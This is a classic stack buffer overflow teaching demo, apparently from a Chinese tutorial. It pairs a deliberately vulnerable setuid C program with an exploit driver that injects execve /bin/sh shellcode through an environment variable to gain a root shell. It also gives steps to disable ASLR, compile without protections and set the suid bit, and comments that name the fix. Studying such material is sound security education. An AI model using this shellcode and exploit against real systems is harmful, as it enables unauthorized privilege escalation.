/* buger.c */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Deliberately vulnerable demonstrator: copies the KIRIKA environment
 * variable into a fixed 128-byte stack buffer with no length check.
 * Built with the flags listed below (no stack protector, executable
 * stack, ASLR off) and installed setuid, an over-long KIRIKA value can
 * overwrite what lies past the buffer, including the saved return address.
 *
 * Mitigation (the one-line fix a real program needs): bound the copy,
 * e.g. snprintf(buffer, sizeof buffer, "%s", envp); and never ship a
 * setuid binary built with -fno-stack-protector / -z execstack.
 */
int main(void)
{
char buffer[128] = {0};
char *envp = NULL;
/* Leaks the buffer's stack address (an info leak in its own right).
 * %p formally takes a void *, so (void *)buffer is the well-defined form. */
printf("buffer address is: %p\n", &buffer);
/* Attacker-controlled: the environment is inherited from whoever execs us,
 * which is exactly what a setuid program must treat as untrusted input. */
envp = getenv("KIRIKA");
if (envp)
strcpy(buffer, envp); /* VULN: unbounded copy -> stack buffer overflow */
return 0;
}
代表有漏洞的可执行程序,并且该文件编译后的可执行文件设置有suid位,可以被利用提权
/* hacker.c */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
extern char **environ;
/*
 * Proof-of-concept driver for the overflow in buger.c: fills a 256-byte
 * payload into the KIRIKA environment variable and re-executes the target
 * via execle() with that environment.
 *   argv[1]  path of the target binary
 *   argv[2]  stack address in hex (the value the target's printf reveals)
 * Payload layout, as the prose below also spells out: shellcode at offset 0,
 * 'A' padding up to offset 152, then six little-endian address bytes.
 * It only works with ASLR disabled, an executable stack and no stack
 * protector (see the build/run steps below) - precisely the conditions a
 * hardened build and an unmodified kernel default remove.
 */
int main(int argc, char **argv)
{
char large_string[256] = {0};
long *long_ptr = (long *)large_string; /* unused; leftover from an earlier variant */
/* Travels as a C string via setenv(), so it must not contain a 0x00 byte. */
char shellcode[] = {"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05"};
/* argc is never checked: running with fewer than two arguments dereferences
 * a NULL argv[2] (UB). strtoul() errors are not detected either (no endptr/errno). */
unsigned long int bufaddr = strtoul(argv[2], NULL, 16);
int i;
/* Address bytes, least-significant first, at offsets 152..157. */
for (i = 0; i < 6; i++) {
large_string[152 + i] = bufaddr & 0xff;
bufaddr >>= 8;
}
/* 'A' filler over bytes 0..151; the shellcode then overwrites its start. */
for (i = 0; i < 152; i++)
large_string[i] = 'A';
/* i is int, strlen() returns size_t: signed/unsigned comparison (-Wsign-compare). */
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
/* Hand the crafted environment to the target; return values of setenv()
 * and execle() are ignored, so a failed exec falls through to return 0. */
setenv("KIRIKA", large_string, 1);
execle(argv[1], argv[1], NULL, environ);
return 0;
}
代表恶意可执行程序,利用buger程序实现提权
运行:
1: echo 0 > /proc/sys/kernel/randomize_va_space
2: gcc -z execstack -fno-stack-protector buger.c -o buger -g
3: chmod +s buger
4: gcc -z execstack -fno-stack-protector hacker.c -o hacker -g
5: ./hacker ./buger 0xff
buffer address is: 0x7fffffffddb0
Segmentation fault (core dumped)
6: ./hacker ./buger 0x7fffffffddb0
buffer address is: 0x7fffffffddb0
# exit
提权流程是这样的:
1: 设置环境变量KIRIKA的值, 注意一点是这是一个字符串, 如果shellcode里面有字符0x00就会出问题,因为字符串是以0x00结尾的
"\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\x0f\x05" //34B
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //118B
"\x78\x56\x34\x12\xff\x7f"